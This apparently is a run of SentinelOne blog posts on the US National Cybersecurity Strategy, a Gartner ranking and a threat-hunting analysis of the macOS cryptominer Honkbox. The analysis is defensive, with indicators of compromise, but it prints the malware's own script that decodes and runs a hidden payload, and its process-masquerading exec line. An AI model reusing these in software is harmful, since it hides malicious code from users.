The National Cybersecurity Strategy aims to tackle evolving cyber threats and vulnerabilities by creating a unified approach to cybersecurity. The plan seeks to protect the nation’s digital infrastructure from cyber threats by leveraging partnerships with the private sector, other governments, and international organizations to enhance cybersecurity capabilities. More importantly, it sets to coordinate the diverse resources of the U.S. government to ideally operate in lockstep, via their respective authorities and areas of responsibility.

The Current Cybersecurity Landscape

Criminal gangs and nation-states increasingly target US government agencies and critical infrastructure, causing disruption, financial losses, and national security threats. Ransomware attacks, one of the most common types of cyber threats, increased by 300% in 2020, and by 2021 the threat of ransomware had become so severe that CISA and the NSA reported attacks on 14 of the nation’s 16 critical infrastructure sectors. Meanwhile, the DoJ noted that, though they received fewer headlines, 75% of all ransomware attacks were on small businesses, proving that the threat is systemic and affecting society and the economy as a whole.

Phishing, social engineering, and supply chain attacks are increasingly common cyber threats that entail the compromise of sensitive data, theft of login credentials, and loss of system integrity via the introduction of malware, leading to financial loss and reputational damage. Understanding the severity of these threats and developing a comprehensive national cybersecurity strategy that addresses these challenges is essential.

Why Do We Need a National Cybersecurity Strategy?

SentinelOne’s Juan Andres Guerrero-Saade, Senior Director of the company’s threat intelligence and research arm SentinelLabs, explained the necessity and importance of the government’s intiative.

“Security vendors, threat intelligence companies, ISPs, mass distribution platforms, hosting providers, and many other essential services and foundational components seamlessly blend together into what we refer to as the Internet. Each of these stakeholders are attempting to defend their own slice of the proverbial pie. This collective can form a formidable force for good, when empowered to work together with the best intentions. However, there are actions beyond the remit of the private sector, like indictment, prosecutions, and law enforcement activities, victim notifications, and leveraging threat intelligence to protect national infrastructure and critical systems. This is where the government gets to play a clear and necessary role, employing unique authorities and resources.

The National Cybersecurity Strategy sets out a direction to coordinate the alphabet soup of diverse public sector organizations with diverse and overlapping authorities. As we detail below, the strategy is split into five pillars with fairly straightforward intent. We won’t know its practical application until further implementation documents are set down on paper and (importantly) budget is assigned to diverse initiatives and government vessels. That may mean we can’t judge its effectiveness at this time, but it’s worth noting that the stated approach at the heart of this new strategy is one of reshaping market dynamics to incentivize and reward security investment.

There’s a recognition that the free market alone isn’t rewarding security investments and has established a series of dark patterns that perpetuate pervasive and insidious difficulties for user safety. The ethos of the internet is one of radical freedom of information, democratized empowerment, and enabling innovation. But given the current state of our security challenges, even its staunchest supporters would do well to welcome some (well-directed) government intervention in furthering digital safety, shifting liability, and fomenting effective coordination.”

Overview of the National Cybersecurity Strategy

In today’s digital age, cybersecurity is no longer a luxury but a necessity. With every technological advancement, the risks and vulnerabilities to our digital infrastructure continue to increase.

The National Cybersecurity Strategy has five key pillars to safeguard the nation from cyber threats and secure the nation’s critical infrastructure, essential services, and digital ecosystem.

1. Defend Critical Infrastructure

Critical infrastructure provides daily essential services to millions of Americans. The first pillar of the National Cybersecurity Strategy recognizes the importance of protecting this critical infrastructure and outlines a plan to ensure its resilience against cyber threats.

This plan calls for an expansion of minimum cybersecurity requirements in critical sectors, the fostering of public-private collaboration, and modernizing Federal networks and incident response policies.

2. Disrupt and Dismantle Threat Actors

The second pillar aims to effectively combat malicious cyber threats. The United States, the strategy says, must use all instruments of national power to disrupt and dismantle threat actors.

This includes strategically employing all tools of national power, engaging the private sector, and addressing the ransomware threat through a comprehensive Federal approach in lockstep with international partners.

3. Shape Market Forces to Drive Security and Resilience

The digital ecosystem is complex, with various stakeholders responsible for ensuring its security and resilience. The National Cybersecurity Strategy seeks to place responsibility on those within the ecosystem who are best positioned to reduce risk and shift the consequences of poor cybersecurity away from the most vulnerable.

Vital to this effort is promoting privacy and the security of personal data, shifting liability for software products and services, and ensuring that Federal grant programs promote investments in new infrastructure that are secure and resilient.

4. Invest in a Resilient Future

Investing in a resilient future is critical to securing the nation’s digital ecosystem against cyber threats. Investment in cybersecurity has not matched the threats we all face, and both the public and private sectors need to address this investment gap.

The National Cybersecurity Strategy will leverage strategic and public investments in innovation, R&D and education. These will aim to ensure U.S leadership in technology and innovation while at the same time defending the nation’s intellectual property, electoral processes and national defenses against adversaries and malicious actors. The strategy will focus on developing and deploying emerging and innovative technologies for cybersecurity.

5. Forge International Partnerships to Pursue Shared Goals

Geographic boundaries do not limit cyber threats, and nations must understand that they cannot combat them alone. The fifth pillar of the National Cybersecurity Strategy seeks to forge international partnerships with like-minded nations to counter threats to the digital ecosystem through joint preparedness, response, and cost imposition.

In order to defend the United States’ national interests, it is critical to increase the capacity of partners to defend themselves against cyber threats. The strategy calls for closer cooperation with US allies and partners to make secure, reliable, and trustworthy global supply chains.

Conclusion

SentinelOne supports the new National Cybersecurity Strategy because it aims to address the growing threat of cybercrime and cyberattacks on the nation’s digital infrastructure.

The strategy emphasizes the need for a cohesive approach to cybersecurity across federal agencies, partnerships with the private sector, and international collaboration to enhance cybersecurity capabilities. By coordinating the resources of the U.S. government, the strategy aims to create a more effective defense against cyber threats.

SentinelOne recognizes the importance of this approach and is committed to supporting the implementation of the National Cybersecurity Strategy to protect America’s digital landscape.

Customer Value, Innovation, and Platform Approach: Why SentinelOne is a Gartner Magic Quadrant Leader

SentinelOne is a Leader in the 2022 Gartner Magic Quadrant for Endpoint Protection Platforms (EPP) and Ranks Highest Across All Gartner Critical Capabilities Use Cases

The results are in: SentinelOne has once again been recognized as a Leader in Magic Quadrant for Endpoint Protection Platforms and ranks highest across all Gartner Critical Capabilities Use Cases. We believe our strong results and upward trajectory in Gartner’s newly released report reflects SentinelOne’s commitment to providing a best-in-class security platform, user experience, and value to organizations of every size, maturity, and industry. SentinelOne is helping organizations to protect their enterprise endpoints from attacks and breaches.

The Gartner Magic Quadrant evaluates vendors based on their Ability to Execute their Completeness of Vision. While the Critical Capabilities report evaluates vendors based on specific capabilities that Gartner believes are important for the market. We look forward to sharing results from the report and a more in-depth analysis of what our performance means for our customers in the coming days. Today, we’d like to reflect on what this recognition tells organizations about SentinelOne.

1. Customer Value Drives Our Mission

In our hyper-connected world, operating safely and effectively has become a top priority for all organizations. Security leaders face unique challenges on the digital battleground, having to contend with regulatory requirements and put up the right defenses to stay steps ahead in an ever-evolving threat landscape. To support our customers, SentinelOne’s offerings encompass all core surfaces of a digital enterprise, including endpoint, cloud, and identity, to deliver operational value and the highest level of protection.

Endpoints reside at the heart of all organizations today. As organizations continue to scale up, many work environments increasingly put the onus on the integrity of the endpoint itself. SentinelOne’s XDR platform eliminates the risk at the endpoint level by providing superior visibility and enterprise-grade prevention, detection, and response.

Identity-based attacks continue to rise with threat actors weaponizing legitimate tools and software known to and used by their victims as their lure. Exploiting human behaviors and user trust, attackers are casting a wider net through sophisticated spoof websites and elaborate phishing campaigns. SentinelOne’s Singularity Identity deflects identity-based attacks by detecting in-progress attacks and obstructing the actor’s progress before they can escalate privileges.

Cloud services boost organizational collaboration, scalability, and efficiency. However, cloud environments require businesses to secure virtual machines, containers, serverless workloads, and Kubernetes – all of which could be leveraged by opportunistic attackers. To combat common cloud-based threats including misconfigurations, insider threats, and supply chain attacks, SentinelOne’s Singularity for Cloud prevents, detects, and investigates threats in real-time without interruption to cloud workloads.

Our mission is to be a force of good and ultimately enable our customers to achieve organizational cyber resilience by reducing risks and increasing security teams efficiency. To accomplish that goal, SentinelOne leverages AI-powered technology to deliver machine speed cybersecurity across our customers’ entire infrastructure. We combine best-in-class prevention and detection and response capabilities in a single platform to defend faster, at greater scale, and with higher accuracy across all attack surfaces. SentinelOne proactively creates value for our customers, focusing on improving the return on investment by providing powerful solutions for every step of the threat lifecycle.

2. SentinelOne Innovates Beyond The Endpoint

SentinelOne has evolved significantly in the past decade, and our performance in the Gartner reports released today reflects that.

In recent years, the exponential increase in machine and user identities have accelerated threat actors’ attention on the identity surface. Security leaders protecting their identity surface from compromise are now looking beyond traditional identity management frameworks like Identity Access Management (IAM) and Privileged Access Management (PAM). While conventional tools and frameworks focus on giving users the access they need at the endpoint level, Identity Threat Detection Response (ITDR) platforms secure the infrastructure that houses vulnerable identities and assess security gaps from an identity-standpoint. SentinelOne provides the critical visibility needed to prevent common identity-based attacks from taking root in the first place.

With the acquisition of Scalyr in 2021, SentinelOne introduced its Security Data Lake which powers today all Singularity platform customers and offers security data ingestion at scale. Furthermore, with the acquisition of Attivo Networks in 2022, SentinelOne expanded its Extended Detection Response (XDR) platform even further and provides today best-in-class security across endpoint, cloud workloads, and identity. SentinelOne customers can rely on threat analysis and mitigation beyond the endpoint and across the entire enterprise and cloud attack surface.

3. A Unified Platform Enabling Customer Leadership

In addition to SentinelOne’s repeat recognition as a Leader in the Gartner Magic Quadrant for Enterprise Protection Platforms, we also received on Gartner Peer Insights™  a 4.8 rating as of 1st March 2023 and a 96% recommendation in the Enterprise Protection Platform and Endpoint Detection and Response categories.

SentinelOne has also achieved a leading performance in MITRE Engenuity Enterprise ATT&CK Evaluations three years running, as well as results in the top of the pack for MITRE’s Deception and Managed Security Services ATT&CK Evaluations.

With threat adversaries moving faster than ever before, our customers rely on SentinelOne to empower them with autonomous, real-time action, richer data, and smarter workflows. Our platform uses the power of static and behavioral AI so customers can confidently build up a stronger, long-term security posture. Our unified Singularity XDR platform is the only cybersecurity platform designed with security analysts in mind, allowing modern enterprises to confidently take action against cyber threats and safeguard their entire attack surface.

SentinelOne’s Commitment To Our Customers

Our performance excellence along with our laser focus on customer outcomes is why 97% of our customers stay with us and invest in growing their cybersecurity programs with us. We are seeing more and more customers who come to us for Endpoint protection evolve their strategies with the adoption of our Cloud, Identity, Attack Surface Management, Security Data Analytics, MDR, and Incident Response modules.

Join us Wednesday, March 8th, 2023, at 8:00 AM PST / 11 AM EST for a webinar to learn more about this milestone. You will also hear from our customers about why they chose SentinelOne and how they leveraged the Gartner Magic Quadrant and MITRE ATT&CK Evaluations to identify SentinelOne as their trusted cybersecurity technology partner.

Webinar | SentinelOne Once Again a Magic Quadrant Leader
Hear from customers how SentinelOne helps them reduce cyber risk and increases cyber resilience.

Wednesday, March 8 at 8:00 AM PST / 11:00 AM EST.

GARTNER is a registered trademark and service mark of Gartner and Magic Quadrant and Peer Insights are a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Chris Silva, 31 December 2022

Hunting for Honkbox | Multistage macOS Cryptominer May Still Be Hiding

For the first time since November 2022, Apple last week released an update to its internal YARA-based malware file blocking service, XProtect. Version 2166 added several new signatures for a threat it labels “Honkbox”, a cryptominer characterized by its leverage of XMRig and the “Invisible Internet Project” (aka I2P). Apple’s update comes on the back of new research from Jamf, which itself builds on earlier research from other sources.

Honkbox is an active threat with at least three variants and multiple components, some of which have not been previously documented. In this post, we describe Honkbox from a threat hunter’s point of view, providing a comprehensive breakdown of file characteristics, unique behavior and sample hashes that analysts and SOC teams can ingest to further aid their detection and response.

Honkbox Cryptominer Background

Apple updated XProtect last week in light of a publication by researchers at Jamf describing a known but relatively undocumented macOS malware.

The new signatures departed from Apple’s recent practice and used human-readable malware names instead of their usual short base 16 strings. Apple’s YARA rules dubbed the malware ‘Honkbox’ (aka HONKBOX, but we’ll spare your eyes).

XProtect update v2166 includes three signatures for Honkbox
XProtect update v2166 includes three signatures for Honkbox

Honkbox is a multistage cryptominer with three identified variants that make novel use of the I2P project. The malware has been distributed on the PirateBay in cracked apps for at least three years by user wtfisthat34698409672. Many of the samples originate from trojanized versions of Logic Pro, but other popular creative applications have been abused including Adobe Zii, Photoshop, Illustrator and Ableton Live.

Honkbox has been circulating since at least 2019 and was likely first spotted in the wild by a reddit user questioning why what appeared to be Apple software was tripping over the macOS firewall.

As the research by Jamf and previously by Trend Micro on one of the earlier variants described, com.apple.acc.network is in fact a masquerade for the I2P command line tool.

i2p used by macos malware honk box

Honkbox is the first known macOS malware to make use of I2P, which in effect functions as an alternative to the better known TOR/Onion router for hiding internet traffic and content. I2P describes itself as “a fully encrypted private network layer [that] protects your activity and location…No one can see where traffic is coming from, where it is going, or what the contents are.”

Traffic inside I2P doesn’t interact with the Internet directly and uses encrypted unidirectional tunnels between anonymous peers. It’s this tunnel traffic that tripped the macOS application firewall reported by the reddit user.

Despite being known to researchers for some time, the recent variants of Honkbox seem to have managed to fly under the radar with a number of samples having low reputation scores on VirusTotal. According to Jamf’s report, the samples they tested also evaded Apple’s built-in security mechanisms.

Some Honkbox variants remain unknown to VirusTotal reputation engines
Some Honkbox variants remain unknown to VirusTotal reputation engines

That situation was corrected last week with the v2166 update to XProtect, which added three signatures Apple labeled “HONKBOX_A”, “HONKBOX_B”, and “HONKBOX_C”.

Honkbox | Distinctive File Characteristics

In radare2 and with YARA installed, we can see if a file under analysis is known to XProtect with the following command:

!yara -w /Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Resources/XProtect.yara `i~file~0[1]`

Taking a sample each of Honkbox_A, _B and _C and using custom power-ups to invoke XProtect and search for IP address regexes, we can observe that the strings related to the localhost address are hard coded in the binary. However, the number of occurrences changes in each variant: four times in A, five in B and three in Honkbox_C.

honkbox variants ports

In addition, variants A and B share in common the use of port 4546, whereas variants B and C share in common the use of ports 4545 and 4543.

A typo that occurs only in variant B misspells the string “Continue process” as “Constinue process”.

A characteristic seen in Honkbox_B variants is the typo “Constinue process”
A characteristic seen in Honkbox_B variants is the typo “Constinue process”

Honkbox_A also hard codes a number of I2P-related URLs. These are not seen in variants B and C.

A characteristic of Honkbox_A is the hard coded “reseed” and other URLs
A characteristic of Honkbox_A is the hard coded “reseed” and other URLs

Perhaps the most distinctive file characteristic of the newer Honkbox variants is the many 2044-byte _cstrings that together constitute the encrypted blob the malware uses to write and execute a working copy of the cracked software that the victim downloaded, along with other components of the malware itself.

The samples of Honkbox_B we analyzed had upwards of 16,000 individual 2044 byte _cstrings embedded in the binaries. All of these were base64-encoded data, save for the last one, which is the plain text execution script passed to the shell via the system() command.

Honkbox_B embeds thousands of individual 2044-byte strings
Honkbox_B embeds thousands of individual 2044-byte strings

Our sample of Honkbox_C, on the other hand, contained a comparatively smaller number of these strings, just over 650.

Honkbox_C has over 650 2044-byte base64-encoded _cstrings
Honkbox_C has over 650 2044-byte base64-encoded _cstrings

The amount of data embedded depends on what “cracked” software the user was lured into downloading.

Honkbox_A does not use an embedded data blob but rather sources the software from the DMG downloaded by the victim.

 Honkbox_A sources the cracked software from its parent disk image
Honkbox_A sources the cracked software from its parent disk image

Honkbox | Distinctive Execution Behavior

Understanding the execution behavior of Honkbox is made relatively simple for the analyst as it is largely laid out in plain text strings in the binaries themselves.

 Honkbox variants obobfuscation
Honkbox variants lack obfuscation

As we shall see in the next section, the authors have taken multiple steps to evade detection on and during execution, but they have paid no heed to obfuscating or thwarting static analysis by researchers. Given the length of time that Honkbox has been successful and relatively invisible, perhaps this was deemed unnecessary by the authors. That could well change in future in light of the recent flurry of interest.

As Honkbox_A execution was well-covered in previous research, here we will restrict our discussion to points useful for analysts and threat hunters.

Honkbox_B spawns a number of processes that ultimately pass the following script to the shell.

SCRIPTPATH=$( cd -- "$(dirname "x00")/.." >/dev/null 2>&1 ; pwd -P );
BLOB_PATH="/tmp/._x00";
IMG_SP_PATH="/tmp/._x00";
[ -f "$IMG_SP_PATH" ] && rm -rf "$IMG_SP_PATH";
[ -d "$IMG_SP_PATH" ] && rm -rf "$IMG_SP_PATH";
TMPDIR="$IMG_SP_PATH/x00.app/Contents";
mkdir -p "$TMPDIR";
( find "$SCRIPTPATH" -type d -mindepth 1 -maxdepth 1 -exec ln -s ../ {} "$TMPDIR" ; ) > /dev/null 2>&1;
rm -rf "$TMPDIR/MacOS";
mkdir "$TMPDIR/MacOS";
(find "$SCRIPTPATH" -type f -maxdepth 1 -exec cp {} "$TMPDIR" ;) > /dev/null 2>&1;
(find "$SCRIPTPATH/MacOS" -type f -mindepth 1 -maxdepth 1 -exec ln -s ../ {} "$TMPDIR/MacOS" ;) > /dev/null 2>&1;
APP_MACH="$TMPDIR/MacOS/x00";
rm -rf "$APP_MACH";
CT=$(mktemp /tmp/._XXXXXXXX);
cat "$BLOB_PATH" | base64 -o "$CT" -d;
tar -xf "$CT" -O >"$APP_MACH";
rm -rf "$CT";
rm -rf "$BLOB_PATH";
chmod +x "$APP_MACH";

Aside from cleaning up any previous installation, the script essentially writes the 2044-byte base64-encoded strings mentioned earlier to file in a subfolder in the /tmp/ directory, unpacks the data, then gives it executable permissions. This file is subsequently launched and appears to the user as the cracked software they intended to run.

Meanwhile, two further processes which masquerade as mdworker_local and mdworker_shared or mdworker_watchd in Honkbox_C serve to run the XMRig miner and the I2P daemon, respectively. We discuss these further below.

The I2P tunnel uses a config folder located either at ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnel.d.

Honkbox IP2 tunnels config path
Honkbox IP2 tunnels config path

Honkbox | Persistence and Evasion Techniques

Honkbox_A drops a property list file in the LaunchDaemons folder if running with privileges and targets an executable in /usr/local/bin. The name of the launch daemon varies depending on the software being masqueraded. In our sample, which presented a working copy of Ableton Live to the target, a privileged process executing from /tmp/lauth writes the following LaunchDaemon:




  
    Label
      com.ableton.LiveEventd
    ProgramArguments
      
        /usr/local/bin/liveeventd.sh
      
    RunAtLoad
      
    LaunchOnlyOnce
      
  

It then writes the targeted liveeventd.sh script into /usr/local/bin.

#!/bin/bash
sleep 60s
/usr/local/bin/liveeventd &
/usr/local/bin/livelocalserviced

The two Mach-O binaries that the script itself targets are also written by lauth.

Behavior in Honkbox Versions B and C is quite different. These forgo persistence of any kind, presumably in an attempt to be more stealthy and avoid detection. Instead, the malware authors rely on the user’s desire to use the trojanized software on a regular basis. How successful that is in turn depends on whether the user, security software or macOS recognizes the application as trojanized.

Code signing checks, which in macOS Ventura take place every time an app is launched, will prevent a doctored app from executing. However, there are other ways to run unsigned or ad hoc signed code on even the latest version of macOS, including on ARM64 (aka M1, M2) processors, so expect to see the malware authors adapt to bypass these restrictions in future.

Another detection evasion mechanism relies on using the shell’s exec builtin to launch a process and replace its actual name with a name supplied by the malware code via the -a option.

In Honkbox B and C variants, this behavior can be seen in the strings hard coded into the binary, where the name of a system binary is passed to the shell in lieu of the process’s actual name.

(( exec -a "/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_shared" "$0" ) & 
echo $! > "/tmp/i2pd/._pid")

Only variants B and C use this technique. Both masquerade as legitimate processes mdworker_shared (Honkbox_B) or mdworker_watchd (Honkbox_C) and mdworker_local (both).

Variant B above; Variant C below. Both use exec -a to masquerade as other processes
Variant B above; Variant C below. Both use exec -a to masquerade as other processes

Further, the malware monitors for the launch of Activity Monitor in case the user notices and attempts to investigate any heavy CPU resources use. If Activity Monitor is detected, the malware immediately kills all its processes and quits.

Honkbox kills its processes if Activity Monitor is launched
Honkbox kills its processes if Activity Monitor is launched

Users wishing to launch Activity Monitor to check for malicious activity can deploy the same trick used by Honkbox mentioned earlier to circumvent this anti-detection technique. Here, we pass the name ‘top’ when we launch Activity Monitor from the command line.

exec -a top /System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor

Now the malware’s pgrep -x "Activity Monitor" code returns false and the miner and associated processes continue to run.

Of course, for those happy to use the command line, it’s equally possible to simply use the top utility or, indeed, proper security software rather than Activity Monitor.

Protecting Against Honkbox Malware

SentinelOne Singularity detects and protects against all known Honkbox variants.


For macOS users not protected by SentinelOne, it is important to ensure that XProtect has been updated to version 2166. This can be achieved by running software update in System Settings or System Preferences applications, according to the version of macOS. XProtect versioning can be checked from the command line:

grep -i -A1 shortversion `mdfind -name XProtect.bundle`/Contents/Info.plist

Security teams and threat hunters should review the indicators of compromise at the end of this post.

Conclusion

Honkbox is a novel piece of macOS malware in a number of ways. Its use of I2P for tunneling and, in the recent variants, its lack of a ‘traditional’ persistence mechanism show the authors prize stealth. The use of multiple detection evasion techniques and masquerades attempt to hide it from users even if they become suspicous. In addition, as some components of this multi-stage malware were not previously documented, it’s possible that some detection solutions may still have to catch up.

SentinelOne fully detects the Honkbox cryptominer and security teams are advised to review the indicators listed below. For more information about how SentinelOne can help protect your macOS fleet, contact us or request a demo.

MITRE ATT&CK

T1036 Process executable has a file extension which is uncommon
T1064 Executes commands using a shell commandline interpreter
T1070.004 Executes the “rm” command to delete files or directories
T1082 Reads the systems hostname
T1095 Performs DNS lookups
T1222 Executes the “chmod” command used to modify permissions
T1564 Executes the “mktemp” command to create a temporary unique file name
T1564.001 Creates and executes hidden MachO files

Indicators of Compromise

Process Names

/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_local
/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_shared
/System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/N/Support/mdworker_watchd

File paths

/Library/LaunchDaemons/com.ableton.LiveEventd
/Library/LaunchDaemons/com.apple.acc.installer.v1.plist
/tmp/com.apple.acc.installer.v1.plist
/tmp/i2pd/._pid
/tmp/installv3_md5
/tmp/installv3.sh
/tmp/lauth
/usr/local/bin/com.apple.acc.installer.v1
/usr/local/bin/liveeventd
/usr/local/bin/liveeventd.sh
/usr/local/bin/livelocalserviced
~/.i2pd/tunnels.conf
~/.i2pd/tunnels.d

Localhost Ports

4543
4545
4546

Embedded URLs (Honkbox_A only)

hxxps://banana[.]incognet[.]io/
hxxps://download[.]xxlspeed[.]com/
hxxps://i2p[.]mooo[.]com/netDb
hxxps://i2p[.]novg[.]net/
hxxps://i2pseed[.]creativecowpat[.]net:8443/
hxxps://netdb[.]i2p2[.]no/
hxxps://reseed-fr[.]i2pd[.]xyz/
hxxps://reseed[.]diva[.]exchange/
hxxps://reseed[.]i2p-projekt[.]de
hxxps://reseed[.]i2pgit[.]org/
hxxps://reseed[.]memcpy[.]io/
hxxps://reseed[.]onion[.]im/
hxxps://reseed2[.]i2p[.]net/

Honkbox_A (Mach-O)

07bf3061b57605fed11a76d5c0c5503b9ae94bcb
0e3a1935dfe58f337dfc0456aeeff9571d6f799b
1e63eb81b45f5c472c3e6e7151f146e886491153
2ae591a3e14d77a9bc077fe61712c6b77f71fc11
33988b411c1064ebdc8bec2d86b7f481fea1c2fe
46b14b1818571f730883278a16065e4f6f3978f1
59efded10b3d023369d335831244303806c61d8c
5f542262af255d95a0e13f2832ffe017f6b9e4a5
608d88038296a6f810e492ad7fee3e62629437da
6329d04f81851779fc02d45565e1ead38044cde7
6751886a9d217b13362fb0533c08abbde949d1ff
687ec2b7d79ed6f953c7f519044b7117d12bdafa
68f4979c04b4753a9f275f29c00d4b260f4c2ec0
6ee76d296abf8da0f98d23f545ba4aa7c69e8211
7035ddb5c826fb86294b68e99f0a5675301cec1e
7377d8c7cd04fd6117c90a6f5ac5375eba459a78
763b43b7c52fe30b799e86909fad2ec7a8732fc6
78d3d2d61bce0871f4c8ddb6d32063c6b46dc135
8292a233fb0291b64481c08f1e88b490d1b9525a
89f2bb7f96317837514bbae70d47ac1e00626ac1
97fbb98f1ecbb2533204eca2967cf4117e388f22
a916bdd1891020ec6cb0e686338341c4d8c20251
b6be4cebb803d6245ac303bcaef3f068fa6f7033
be451edf04e68f2d4e180a64ba7bb238b5241e3e
c52d182e05615f6083a4430bf31cf8ae32485688
c59ee7dbfcfa5233d9e9321936c7fbc01424e4ba
ca31bb68d5a1aed57597c588b7420d3186ed6b95
cbf69ee83a2750a9e3614036476b5f9f936fe073
cea42a9b59cfa262453b508ea21d96f87bb793da
da6ecdcbeca15d8487d0cf4c008cd67088bdb3ad
e2488ba66347cf32ba4dbc2e75a23561d4726e80
e8cc61445f467b68e061fa8118be13de013f9f7d
e94e380224ac4e6eff728180a2f5396a3c5d0363

Honkbox_B (Mach-O)

0308445d6303d7edb5eb580edf84a59388477c82
1fb6e00edaa11f6332ae752424f9c5cfb6114deb
29cdfe14b97f748b40a87c9ced24f322afed948c
2a040318d15348c6f5c5cf37973ed365dcf7bd4f
2defaf34319b6255db45c8bebf55d5095a41bed8
38ad7a25da72e1f57bc13a74e59f2c9156fa2417
3ab040271882eb6c3a028498c7469450610ef7b8
3ded983006e3682e7c4dc3d863781f35bea92165
3e7a63a9048e35437b632db94531a81561057ce5
4292d8c9a6b861a0075895bc2bc0b8921663ed5c
43c6593e5164db602324d481c481095ad1bf1a13
4637207b424b6632163005d7c3a31a63702bb408
4bdeac2dc7d60bd7d4bf4ff075f05efbdd18030e
53bea5f857571d73b7b4a1f6db1edd340d453bca
53fd50b23372a73e74e7cdc370f51ac560a1130f
5472f9a4b101c4bcf4f2134504f0db6d7fe07ea3
5e4792e459f1107cf83ce3293141f9ba3026b015
5eebbb1a8cd3cbdb9eb98eb6719fed618ff27621
5f3ab48629914acdbaef2509a45979c185adf5b9
69fd812cf3760dc3dff5d41972cc635de9a0844d
6e150647e8c723fb001534142bc849651b7fcf43
70bdd13da250924a975346acc1c6e0700a97e8b0
7628d90cfd311bfd4997729a232ca77a6d443619
8907721154fc4079f9fc68e58c0ca742ffc1c9af
8926ad924bb12e607ca5bf029adf417e83bbc8da
8e2a8977ae86eb24e481be5623d5cc8dc47da705
8ed83d6593bb0c7404f4571c91a4a80022088922
95f71894eec20f9727ff1311ad078de38ae4e774
a0ca2803c3face7c0b4a0ef7068a8fafc85f9ff3
a605e20250e66726a58699a2ae4f7264c8c2e4e2
adc879e80397e5d8fdaf7f0a85c9472bc633ff1d
b0b6050f6d2ac661022ebb56a06e30912aca527d
b2c6556c22efc74f14219e362e75b5913b3245e1
b52f25672953d947e0a993e5f0f3c401ef87d127
b675028dcbaa538f24e8998632312e16fdf19e9b
bb71b155aefc560591032ec01f36dcb86a729ee6
bce251548798f159e99e71e68b65bbb4a9607296
bebe1ad82d595434c6ef529cb4f75f4937a04e5f
bfd8dea4de5a5171145a462f876a44eab41a0446
c10079ed5885c64c0da6302bc91adf5b293aef4c
c19e78df3b3462064b9d78bc138674a7e8df28c7
cd0c78f24eb1f636708d957dcf71196c6260b244
cf685bb0fe5e078ea28a25a7cf8774b168787db4
d0e93f73ddc8c9c148ac16d480272e705ff22364
d15cdac63c5227836196c03850b35f374166bda3
d510b4c602404767f9ef75f5a48017d2b3743c4c
d86695fb9e56e03253503781f42f1069a5cc10d1
e12cb82b4393dc61275622d691393056d278c984
ec22e64817ca6c92ecbe5279d4536d506ed2e37e
edd9643709c5fb7da9ef3eec569ffbc1bd440fed
f03c06b937918ad0f7dc70c6c0238997429bae73
f12c739b4261d4d7d155621f61f01f0d833df40f
f296917562ec7137c6c70e81ef31c73c549bd082
f3ae686e1bc85ff68962e2a1a83d2b48ecf3072a
f6348b7b79e48b5d2c13b8aa560c795d7a2c21d8

Honkbox_C (Mach-O)

1214ccc069d0ff00dd3c3e1ec8e2bcc067245d9e
152b53cf3987a2f775b1f4af4cc6a0ca9597027c
18f7c4a44129fb4410b3f5c216c376c6a7636f6a
1b621d675e3b8cadbdbdddbf226647da8ad2420a
22f70b0452212fc478e7d809d9f4c07049dfc900
4fd50fc1cf73d614f59b7d454feebe40887d65e7